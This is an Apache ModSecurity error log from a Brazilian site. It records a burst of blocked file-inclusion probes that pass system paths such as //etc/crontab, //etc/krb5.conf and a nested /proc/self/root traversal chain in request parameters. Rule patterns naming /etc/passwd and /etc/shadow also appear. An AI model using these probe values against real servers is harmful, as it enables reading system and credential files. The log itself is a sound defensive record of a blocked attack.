[Thu Mar 19 11:45:05.676545 2026] [:error] [pid 30077:tid 140411674785536] [client 57.141.18.40:36136] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL8fu8EFLIOrSqIput0AAAAkg"]
[Thu Mar 19 11:45:05.713674 2026] [:error] [pid 30077:tid 140411699963648] [client 57.141.18.79:36140] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL8fu8EFLIOrSqIput0QAAAkU"]
[Thu Mar 19 11:45:06.667292 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.228.61:36872] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwL8v-YZRR_7pZ7nDKSEQAAA8o"]
[Thu Mar 19 11:45:08.862041 2026] [:error] [pid 30077:tid 140411599251200] [client 57.141.18.27:36222] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL9Pu8EFLIOrSqIput2QAAAlE"]
[Thu Mar 19 11:45:10.315892 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.30:35584] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL9da6ubjKNq_cu4ZbtgAAA0o"]
[Thu Mar 19 11:45:11.813496 2026] [:error] [pid 31803:tid 140411708356352] [client 57.141.18.49:35718] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL9uyqAr6etmhZHNpmtwAAAEQ"]
[Thu Mar 19 11:45:11.816967 2026] [:error] [pid 27293:tid 140411683178240] [client 57.141.18.54:36264] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL9_-YZRR_7pZ7nDKSEwAAA8c"]
[Thu Mar 19 11:45:11.818039 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.31:36270] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL9-oXxyEfFpUF8f8UNQAAAVU"]
[Thu Mar 19 11:45:12.071348 2026] [:error] [pid 15826:tid 140411674785536] [client 57.141.18.53:36292] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL-OoXxyEfFpUF8f8UNgAAAUg"]
[Thu Mar 19 11:45:12.331143 2026] [:error] [pid 31803:tid 140411733534464] [client 57.141.18.75:36298] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL-OyqAr6etmhZHNpmuQAAAEE"]
[Thu Mar 19 11:45:12.771178 2026] [:error] [pid 27293:tid 140411733534464] [client 57.141.18.90:36312] [client 57.141.18.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL-P-YZRR_7pZ7nDKSFQAAA8E"]
[Thu Mar 19 11:45:12.826502 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:37178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwL-Mdf6f5d65gmYZR-LgAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:45:13.539318 2026] [:error] [pid 30077:tid 140411624429312] [client 57.141.18.41:36248] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL-fu8EFLIOrSqIput3wAAAk4"]
[Thu Mar 19 11:45:13.765888 2026] [:error] [pid 14269:tid 140411733534464] [client 57.141.18.105:36328] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL-QbLMZ6AikZjR9VjwgAAAAE"]
[Thu Mar 19 11:45:13.970070 2026] [:error] [pid 17887:tid 140411658000128] [client 57.141.18.6:36332] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL-QkwaGbbGflqUZDJ7wAAAMo"]
[Thu Mar 19 11:45:14.895643 2026] [:error] [pid 17887:tid 140411565680384] [client 57.141.18.77:36242] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL-gkwaGbbGflqUZDJ8AAAANU"]
[Thu Mar 19 11:45:14.986615 2026] [:error] [pid 17653:tid 140411599251200] [client 57.141.18.109:36354] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL-sdf6f5d65gmYZR-MwAAAtE"]
[Thu Mar 19 11:45:15.355045 2026] [:error] [pid 30077:tid 140411574073088] [client 57.141.18.96:36366] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL-_u8EFLIOrSqIput4AAAAlQ"]
[Thu Mar 19 11:45:15.907040 2026] [:error] [pid 17887:tid 140411691570944] [client 57.141.18.75:36372] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL-wkwaGbbGflqUZDJ8gAAAMY"]
[Thu Mar 19 11:45:16.118844 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34304] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:45:16.660768 2026] [:error] [pid 17653:tid 140411565680384] [client 57.141.18.118:36340] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL_Mdf6f5d65gmYZR-NgAAAtU"]
[Thu Mar 19 11:45:17.071038 2026] [:error] [pid 27403:tid 140411607643904] [client 57.141.18.33:36402] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL_RkFeYa1D6dYQnD3KQAAAdA"]
[Thu Mar 19 11:45:17.383161 2026] [:error] [pid 27403:tid 140411632822016] [client 57.141.18.95:36408] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL_RkFeYa1D6dYQnD3KgAAAc0"]
[Thu Mar 19 11:45:17.800156 2026] [:error] [pid 27293:tid 140411691570944] [client 57.141.18.122:36388] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL_f-YZRR_7pZ7nDKSGAAAA8Y"]
[Thu Mar 19 11:45:18.909240 2026] [:error] [pid 27403:tid 140411674785536] [client 57.141.18.11:36434] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL_hkFeYa1D6dYQnD3KwAAAcg"]
[Thu Mar 19 11:45:19.129068 2026] [:error] [pid 27293:tid 140411716749056] [client 57.141.18.64:36420] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL__-YZRR_7pZ7nDKSGgAAA8M"]
[Thu Mar 19 11:45:19.516014 2026] [:error] [pid 30077:tid 140411683178240] [client 57.141.18.72:36426] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwL__u8EFLIOrSqIput4gAAAkc"]
[Thu Mar 19 11:45:20.118336 2026] [:error] [pid 17887:tid 140411574073088] [client 57.141.18.93:36456] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMAAkwaGbbGflqUZDJ9AAAANQ"]
[Thu Mar 19 11:45:20.488313 2026] [:error] [pid 27293:tid 140411565680384] [client 57.141.18.89:36466] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMAP-YZRR_7pZ7nDKSGwAAA9U"]
[Thu Mar 19 11:45:21.061006 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.44:36448] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMAda6ubjKNq_cu4ZbuAAAA0Q"]
